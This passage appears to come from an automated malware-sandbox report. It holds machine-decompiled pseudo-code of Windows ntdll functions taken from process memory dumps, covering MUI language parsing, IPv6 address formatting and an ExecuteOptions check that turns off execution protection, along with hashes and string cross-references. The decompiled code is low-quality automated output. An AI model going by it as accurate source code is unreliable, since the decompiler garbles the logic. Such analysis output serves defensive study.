						_t261 = E024FE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E024EE2A8(_v12,  &_v68, _v16);
							if(E02505553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E024FE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E024EE2A8(_t322,  &_v68, _t269);
							if(E02505553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E024EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E024EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0250718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E024EE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E024E2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E024FE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E024EE2A8(_v12,  &_v68, _v16);
						if(E02505553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E024FE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E024EE2A8(_t322,  &_v68, _t296);
						if(E02505553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E024EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E024EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                                                                                                                    0x02508788
                                                                                                                                                    0x02508788
                                                                                                                                                    0x02508791
                                                                                                                                                    0x02508794
                                                                                                                                                    0x02508798
                                                                                                                                                    0x0250879b
                                                                                                                                                    0x0250879e
                                                                                                                                                    0x025087a1
                                                                                                                                                    0x025087a4
                                                                                                                                                    0x025087a7
                                                                                                                                                    0x025087aa
                                                                                                                                                    0x025087af
                                                                                                                                                    0x02551ad3
                                                                                                                                                    0x02508b0a
                                                                                                                                                    0x02508b0d
                                                                                                                                                    0x02508b13
                                                                                                                                                    0x02508b19
                                                                                                                                                    0x02508b1f
                                                                                                                                                    0x02508b25
                                                                                                                                                    0x02508b2b
                                                                                                                                                    0x02508b31
                                                                                                                                                    0x02508b37
                                                                                                                                                    0x02508b3d
                                                                                                                                                    0x02508b46
                                                                                                                                                    0x02508b46
                                                                                                                                                    0x025087c6
                                                                                                                                                    0x025087d0
                                                                                                                                                    0x02551ae0
                                                                                                                                                    0x02551ae6
                                                                                                                                                    0x02551af8
                                                                                                                                                    0x02551af8
                                                                                                                                                    0x02551afd
                                                                                                                                                    0x02551afe
                                                                                                                                                    0x02551b01
                                                                                                                                                    0x02551b06
                                                                                                                                                    0x02551b06
                                                                                                                                                    0x025087d6
                                                                                                                                                    0x025087f2
                                                                                                                                                    0x025087f7
                                                                                                                                                    0x02508807
                                                                                                                                                    0x0250880a
                                                                                                                                                    0x0250880f
                                                                                                                                                    0x02508810
                                                                                                                                                    0x02508813
                                                                                                                                                    0x02508818
                                                                                                                                                    0x02508818
                                                                                                                                                    0x0250882c
                                                                                                                                                    0x02508831
                                                                                                                                                    0x02508838
                                                                                                                                                    0x02508908
                                                                                                                                                    0x02508920
                                                                                                                                                    0x025089f0
                                                                                                                                                    0x02508a08
                                                                                                                                                    0x02508af6
                                                                                                                                                    0x02508af6
                                                                                                                                                    0x02508af8
                                                                                                                                                    0x02508afb
                                                                                                                                                    0x02551beb
                                                                                                                                                    0x02551beb
                                                                                                                                                    0x02508b04
                                                                                                                                                    0x02551bf8
                                                                                                                                                    0x02551c0e
                                                                                                                                                    0x02551c13
                                                                                                                                                    0x02551c16
                                                                                                                                                    0x02551c16
                                                                                                                                                    0x02551bf8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02508b04
                                                                                                                                                    0x02508a0e
                                                                                                                                                    0x02508a11
                                                                                                                                                    0x02508a14
                                                                                                                                                    0x02508a15
                                                                                                                                                    0x02508a18
                                                                                                                                                    0x02508a22
                                                                                                                                                    0x02508b59
                                                                                                                                                    0x02508a28
                                                                                                                                                    0x02508a3c
                                                                                                                                                    0x02508a3c
                                                                                                                                                    0x02508a42
                                                                                                                                                    0x02551bb0
                                                                                                                                                    0x02551b11
                                                                                                                                                    0x02551b11
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02508a48
                                                                                                                                                    0x02508a51
                                                                                                                                                    0x02508a5b
                                                                                                                                                    0x02508a5e
                                                                                                                                                    0x02508a61
                                                                                                                                                    0x02508a69
                                                                                                                                                    0x02508a69
                                                                                                                                                    0x02508a6d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02508a74
                                                                                                                                                    0x02508a7c
                                                                                                                                                    0x02508a7d
                                                                                                                                                    0x02508a91
                                                                                                                                                    0x02508a93
                                                                                                                                                    0x02508a93
                                                                                                                                                    0x02508a98
                                                                                                                                                    0x02508a9b
                                                                                                                                                    0x02508aa1
                                                                                                                                                    0x02508aa1
                                                                                                                                                    0x02508aa4
                                                                                                                                                    0x02508aaa
                                                                                                                                                    0x02508ab1
                                                                                                                                                    0x02508ac5
                                                                                                                                                    0x02508ac7
                                                                                                                                                    0x02508ac7
                                                                                                                                                    0x02508ac5
                                                                                                                                                    0x02508ace
                                                                                                                                                    0x02551bc9
                                                                                                                                                    0x02551bce
                                                                                                                                                    0x02551bd2
                                                                                                                                                    0x02551bd2
                                                                                                                                                    0x02508ad8
                                                                                                                                                    0x02508aeb
                                                                                                                                                    0x02508aeb
                                                                                                                                                    0x02508af0
                                                                                                                                                    0x02508af4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02508af4
                                                                                                                                                    0x02508a42
                                                                                                                                                    0x02508926
                                                                                                                                                    0x02508929
                                                                                                                                                    0x0250892c
                                                                                                                                                    0x0250892d
                                                                                                                                                    0x02508930
                                                                                                                                                    0x02508935
                                                                                                                                                    0x0250893a
                                                                                                                                                    0x02508b51
                                                                                                                                                    0x02508940
                                                                                                                                                    0x02508954
                                                                                                                                                    0x02508954
                                                                                                                                                    0x0250895a
                                                                                                                                                    0x02551b63
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02508960
                                                                                                                                                    0x02508969
                                                                                                                                                    0x02508973
                                                                                                                                                    0x02508976
                                                                                                                                                    0x02508979
                                                                                                                                                    0x0250897e
                                                                                                                                                    0x02508981
                                                                                                                                                    0x02508981
                                                                                                                                                    0x02508986
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02551b6e
                                                                                                                                                    0x02551b74
                                                                                                                                                    0x02551b7b
                                                                                                                                                    0x02551b8f
                                                                                                                                                    0x02551b91
                                                                                                                                                    0x02551b91
                                                                                                                                                    0x02551b99
                                                                                                                                                    0x02551b9c
                                                                                                                                                    0x02551ba2
                                                                                                                                                    0x02551ba2
                                                                                                                                                    0x0250898c
                                                                                                                                                    0x02508992
                                                                                                                                                    0x02508999
                                                                                                                                                    0x025089ad
                                                                                                                                                    0x02551ba8
                                                                                                                                                    0x02551ba8
                                                                                                                                                    0x025089ad
                                                                                                                                                    0x025089b6
                                                                                                                                                    0x025089c8
                                                                                                                                                    0x025089cd
                                                                                                                                                    0x025089d0
                                                                                                                                                    0x025089d0
                                                                                                                                                    0x025089d6
                                                                                                                                                    0x025089e8
                                                                                                                                                    0x025089e8
                                                                                                                                                    0x025089ed
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025089ed
                                                                                                                                                    0x0250895a
                                                                                                                                                    0x0250883e
                                                                                                                                                    0x02508841
                                                                                                                                                    0x02508844
                                                                                                                                                    0x02508845
                                                                                                                                                    0x02508848
                                                                                                                                                    0x0250884d
                                                                                                                                                    0x02508852
                                                                                                                                                    0x02508b49
                                                                                                                                                    0x02508858
                                                                                                                                                    0x0250886c
                                                                                                                                                    0x0250886c
                                                                                                                                                    0x02508872
                                                                                                                                                    0x02551b0e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02508878
                                                                                                                                                    0x02508881
                                                                                                                                                    0x0250888b
                                                                                                                                                    0x0250888e
                                                                                                                                                    0x02508891
                                                                                                                                                    0x02508896
                                                                                                                                                    0x02508899
                                                                                                                                                    0x02508899
                                                                                                                                                    0x0250889e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02551b21
                                                                                                                                                    0x02551b27
                                                                                                                                                    0x02551b2e
                                                                                                                                                    0x02551b42
                                                                                                                                                    0x02551b44
                                                                                                                                                    0x02551b44
                                                                                                                                                    0x02551b4c
                                                                                                                                                    0x02551b4f
                                                                                                                                                    0x02551b55
                                                                                                                                                    0x02551b55
                                                                                                                                                    0x025088a4
                                                                                                                                                    0x025088aa
                                                                                                                                                    0x025088b1
                                                                                                                                                    0x025088c5
                                                                                                                                                    0x02551b5b
                                                                                                                                                    0x02551b5b
                                                                                                                                                    0x025088c5
                                                                                                                                                    0x025088ce
                                                                                                                                                    0x025088e0
                                                                                                                                                    0x025088e5
                                                                                                                                                    0x025088e8
                                                                                                                                                    0x025088e8
                                                                                                                                                    0x025088ee
                                                                                                                                                    0x02508900
                                                                                                                                                    0x02508900
                                                                                                                                                    0x02508905
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02508905

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 02508914
                                                                                                                                                    • WindowsExcludedProcs, xrefs: 025087C1
                                                                                                                                                    • Kernel-MUI-Language-SKU, xrefs: 025089FC
                                                                                                                                                    • Kernel-MUI-Language-Allowed, xrefs: 02508827
                                                                                                                                                    • Kernel-MUI-Number-Allowed, xrefs: 025087E6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcspbrk
                                                                                                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                    • API String ID: 402402107-258546922
                                                                                                                                                    • Opcode ID: ac6a03b86071b45eeccb40435eb12831d494f44e63edb32841c35b870c05852c
                                                                                                                                                    • Instruction ID: ed77c9d7532c7e30324d18c6ec3cc6b58aa1f748d05cd6b0aaacb3c5aa26ea63
                                                                                                                                                    • Opcode Fuzzy Hash: ac6a03b86071b45eeccb40435eb12831d494f44e63edb32841c35b870c05852c
                                                                                                                                                    • Instruction Fuzzy Hash: 66F125B2D00619EFDF11EF95C984EEEBBB9BF08314F10446AE906A7251E7309A44CF64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 025213CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 38%
                                                                                                                                                    			E025213CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E02517707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x24e2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E02517707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x24e9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E02517707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E02517707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E02517707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E02517707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                                                                                                                    0x025213d5
                                                                                                                                                    0x025213d9
                                                                                                                                                    0x025213dc
                                                                                                                                                    0x025213de
                                                                                                                                                    0x025213e1
                                                                                                                                                    0x025213e8
                                                                                                                                                    0x025213ee
                                                                                                                                                    0x0254e8fd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254e921
                                                                                                                                                    0x0254e921
                                                                                                                                                    0x0254e928
                                                                                                                                                    0x0254e982
                                                                                                                                                    0x0254e98a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254e99a
                                                                                                                                                    0x0254e99e
                                                                                                                                                    0x0254e9a3
                                                                                                                                                    0x0254e9a8
                                                                                                                                                    0x0254e9b9
                                                                                                                                                    0x0254e978
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254e978
                                                                                                                                                    0x0254e98a
                                                                                                                                                    0x0254e92a
                                                                                                                                                    0x0254e931
                                                                                                                                                    0x0254e944
                                                                                                                                                    0x0254e944
                                                                                                                                                    0x0254e950
                                                                                                                                                    0x0254e954
                                                                                                                                                    0x0254e959
                                                                                                                                                    0x0254e95e
                                                                                                                                                    0x0254e963
                                                                                                                                                    0x0254e970
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254e975
                                                                                                                                                    0x0254e93b
                                                                                                                                                    0x0254e980
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254e980
                                                                                                                                                    0x0254e942
                                                                                                                                                    0x0254e94b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254e94b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254e942
                                                                                                                                                    0x025213f4
                                                                                                                                                    0x025213f4
                                                                                                                                                    0x025213f9
                                                                                                                                                    0x025213fc
                                                                                                                                                    0x025213ff
                                                                                                                                                    0x02521406
                                                                                                                                                    0x0254e9cc
                                                                                                                                                    0x0254e9d2
                                                                                                                                                    0x0254e9d2
                                                                                                                                                    0x0254e9cc
                                                                                                                                                    0x0252140c
                                                                                                                                                    0x02521411
                                                                                                                                                    0x02521431
                                                                                                                                                    0x0252143a
                                                                                                                                                    0x0252143c
                                                                                                                                                    0x0252143f
                                                                                                                                                    0x0252143f
                                                                                                                                                    0x02521442
                                                                                                                                                    0x02521447
                                                                                                                                                    0x025214a8
                                                                                                                                                    0x025214ac
                                                                                                                                                    0x0254e9e2
                                                                                                                                                    0x0254e9e7
                                                                                                                                                    0x0254e9ec
                                                                                                                                                    0x0254ea05
                                                                                                                                                    0x0254ea05
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02521449
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02521449
                                                                                                                                                    0x0252144c
                                                                                                                                                    0x02521459
                                                                                                                                                    0x02521462
                                                                                                                                                    0x02521469
                                                                                                                                                    0x0252146a
                                                                                                                                                    0x02521470
                                                                                                                                                    0x02521473
                                                                                                                                                    0x02521476
                                                                                                                                                    0x02521476
                                                                                                                                                    0x02521490
                                                                                                                                                    0x02521495
                                                                                                                                                    0x0252138e
                                                                                                                                                    0x02521390
                                                                                                                                                    0x02521397
                                                                                                                                                    0x02521398
                                                                                                                                                    0x02521399
                                                                                                                                                    0x025213a1
                                                                                                                                                    0x025213a4
                                                                                                                                                    0x025213a4
                                                                                                                                                    0x02521498
                                                                                                                                                    0x0252149c
                                                                                                                                                    0x0252149f
                                                                                                                                                    0x025214a2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025214a4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025214a4
                                                                                                                                                    0x02521413
                                                                                                                                                    0x02521415
                                                                                                                                                    0x02521416
                                                                                                                                                    0x02521419
                                                                                                                                                    0x0252141c
                                                                                                                                                    0x02521422
                                                                                                                                                    0x025213b7
                                                                                                                                                    0x025213bc
                                                                                                                                                    0x025213bf
                                                                                                                                                    0x025213bf
                                                                                                                                                    0x025213c2
                                                                                                                                                    0x02521424
                                                                                                                                                    0x02521424
                                                                                                                                                    0x02521424
                                                                                                                                                    0x02521427
                                                                                                                                                    0x0252142b
                                                                                                                                                    0x0252142c
                                                                                                                                                    0x0252142c
                                                                                                                                                    0x0252142c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0252141c
                                                                                                                                                    0x02521411

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                                                    • Opcode ID: c4913dce33686dea8b60a84d9f383ae1c35de27bbcf05da6fa08596bd9b57fc3
                                                                                                                                                    • Instruction ID: fc5db087bb3545e155797d8d74ad6a4ff126017e7d2ac478bdbd0a52e066d813
                                                                                                                                                    • Opcode Fuzzy Hash: c4913dce33686dea8b60a84d9f383ae1c35de27bbcf05da6fa08596bd9b57fc3
                                                                                                                                                    • Instruction Fuzzy Hash: A7612371D00A66AADF24CF59C8808BFBFB6FF96305B14C52EE49E465C1D730A644CBA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02517EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                    			E02517EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x25c2088; // 0x767370ef
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E02517F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E02533F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E024EDFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x25c4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E02533F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E024F0D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E02533F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E024F8375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E02533F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0255E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E02533F92();
					_t38 = 1;
					L2:
					return E024EE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                                                                                                                    0x02517f08
                                                                                                                                                    0x02517f0f
                                                                                                                                                    0x02517f12
                                                                                                                                                    0x02517f1b
                                                                                                                                                    0x02517f31
                                                                                                                                                    0x02533ead
                                                                                                                                                    0x02533eb4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02533eba
                                                                                                                                                    0x02533ecd
                                                                                                                                                    0x02533ed2
                                                                                                                                                    0x02533ee1
                                                                                                                                                    0x02533ee7
                                                                                                                                                    0x02533eec
                                                                                                                                                    0x02533f12
                                                                                                                                                    0x02533f18
                                                                                                                                                    0x02533f1a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02533f20
                                                                                                                                                    0x02533f26
                                                                                                                                                    0x02533f28
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02533f2e
                                                                                                                                                    0x02533f30
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02533f3a
                                                                                                                                                    0x02533f3b
                                                                                                                                                    0x02533f53
                                                                                                                                                    0x02533f64
                                                                                                                                                    0x02533f69
                                                                                                                                                    0x02533f6c
                                                                                                                                                    0x02533f6d
                                                                                                                                                    0x02533f6f
                                                                                                                                                    0x0253e304
                                                                                                                                                    0x0253e30f
                                                                                                                                                    0x0253e315
                                                                                                                                                    0x0253e31e
                                                                                                                                                    0x0253e321
                                                                                                                                                    0x0253e327
                                                                                                                                                    0x0253e329
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0253e32f
                                                                                                                                                    0x0253e32f
                                                                                                                                                    0x0253e337
                                                                                                                                                    0x0253e33a
                                                                                                                                                    0x0253e33b
                                                                                                                                                    0x0253e33d
                                                                                                                                                    0x0253e33f
                                                                                                                                                    0x0253e341
                                                                                                                                                    0x0253e341
                                                                                                                                                    0x0253e34e
                                                                                                                                                    0x0253e353
                                                                                                                                                    0x0253e358
                                                                                                                                                    0x0253e35d
                                                                                                                                                    0x0253e35f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0253e365
                                                                                                                                                    0x0253e365
                                                                                                                                                    0x0253e368
                                                                                                                                                    0x0253e36e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0253e374
                                                                                                                                                    0x0253e32f
                                                                                                                                                    0x02533f75
                                                                                                                                                    0x02533f7a
                                                                                                                                                    0x02533f7c
                                                                                                                                                    0x02533f7e
                                                                                                                                                    0x02533f86
                                                                                                                                                    0x02517f39
                                                                                                                                                    0x02517f47
                                                                                                                                                    0x02517f47
                                                                                                                                                    0x02517f37
                                                                                                                                                    0x02517f37
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02533F12
                                                                                                                                                    Strings
                                                                                                                                                    • Execute=1, xrefs: 02533F5E
                                                                                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02533F75
                                                                                                                                                    • ExecuteOptions, xrefs: 02533F04
                                                                                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02533EC4
                                                                                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02533F4A
